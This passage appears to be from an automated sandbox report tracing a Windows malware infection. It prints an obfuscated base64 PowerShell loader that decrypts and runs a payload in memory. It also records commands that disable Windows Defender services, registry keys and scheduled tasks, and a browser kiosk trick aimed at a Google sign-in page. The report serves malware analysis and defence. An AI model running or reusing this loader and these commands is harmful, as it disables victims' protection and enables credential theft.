d3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"8⤵
- Executes dropped EXE
PID:2708 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2708 -s 369⤵
- Loads dropped DLL
PID:3008
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
PID:440 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 440 -s 449⤵
- Loads dropped DLL
PID:464
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
PID:848 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 848 -s 369⤵
- Loads dropped DLL
PID:1336
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\is-LEJLK.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-LEJLK.tmp\Bell_Setup16.tmp" /SL5="$12015A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\is-OIV14.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-OIV14.tmp\Bell_Setup16.tmp" /SL5="$13015A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2204 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3012
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
- Executes dropped EXE
PID:272
-
-
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"8⤵
- Executes dropped EXE
PID:1716 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1716 -s 289⤵
- Loads dropped DLL
PID:604
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043750101\21572c0b2a.exe"C:\Users\Admin\AppData\Local\Temp\10043750101\21572c0b2a.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3620 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043750101\21572c0b2a.exe"9⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043760101\fb26e2dee5.exe"C:\Users\Admin\AppData\Local\Temp\10043760101\fb26e2dee5.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3260 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043760101\fb26e2dee5.exe"9⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3392
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7639.tmp\763A.tmp\763B.bat C:\Users\Admin\AppData\Local\Temp\22.exe"8⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2916 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7668.tmp\7669.tmp\766A.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"10⤵
- Drops file in Program Files directory
PID:2764 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2616
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:2648
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:292
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:1216
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2856
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1952
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1704
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2760
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:2748
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:1896
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:1148
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:2492
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:2900
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:1504
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:2992
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:444
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵PID:668
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:1128
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:2784
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:1324
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:752
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:604
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1544
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:656
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:2292
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:2064
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:1040
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:2176
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:2400
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:1616
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:1836
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:2060
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:2572
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:1736
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:836
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:876
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:612
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:324
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:1588
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:2224
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:3000
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:288
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:2256
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:2676
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2928
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2284
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2888
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367470101\4134bcbcf6.exe"C:\Users\Admin\AppData\Local\Temp\10367470101\4134bcbcf6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2760
-
-
C:\Users\Admin\AppData\Local\Temp\10367480101\3e23f0d1f6.exe"C:\Users\Admin\AppData\Local\Temp\10367480101\3e23f0d1f6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\10367490101\f1b96dde78.exe"C:\Users\Admin\AppData\Local\Temp\10367490101\f1b96dde78.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\10367500101\e6701df100.exe"C:\Users\Admin\AppData\Local\Temp\10367500101\e6701df100.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:984 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2036
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1516 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.0.1816794310\43201584" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {683da92c-3cc2-4ffe-8bb5-49b5a52d75c1} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 1292 11dd7858 gpu9⤵PID:2608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.1.347977658\1576669674" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8c054a6-eee4-4445-8fa4-4246d0e89b17} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 1492 e71b58 socket9⤵PID:2660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.2.2039676615\1000788790" -childID 1 -isForBrowser -prefsHandle 2180 -prefMapHandle 2176 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7870d6b-80a4-4995-a900-73eff8d88c77} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 2192 198ef558 tab9⤵PID:2404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.3.607650216\10745090" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {59dde53d-3d37-4baf-ac7b-6bf0880b5ef1} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 2924 e5e458 tab9⤵PID:2804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.4.442866415\2111758440" -childID 3 -isForBrowser -prefsHandle 3752 -prefMapHandle 3748 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b1fbf13-f8d6-464f-92cc-1fca23fa75f9} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 3764 20bc2d58 tab9⤵PID:3016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.5.487816481\678762329" -childID 4 -isForBrowser -prefsHandle 3796 -prefMapHandle 3868 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef109c10-5ca6-4e09-9905-9d4ff08d7ca3} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 3968 2144f258 tab9⤵PID:2340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.6.856992852\1954468525" -childID 5 -isForBrowser -prefsHandle 4104 -prefMapHandle 4108 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {75580f7a-b668-4f87-ac0d-7597682b5ff0} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 4088 21451958 tab9⤵PID:1564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10367510101\63685cf865.exe"C:\Users\Admin\AppData\Local\Temp\10367510101\63685cf865.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
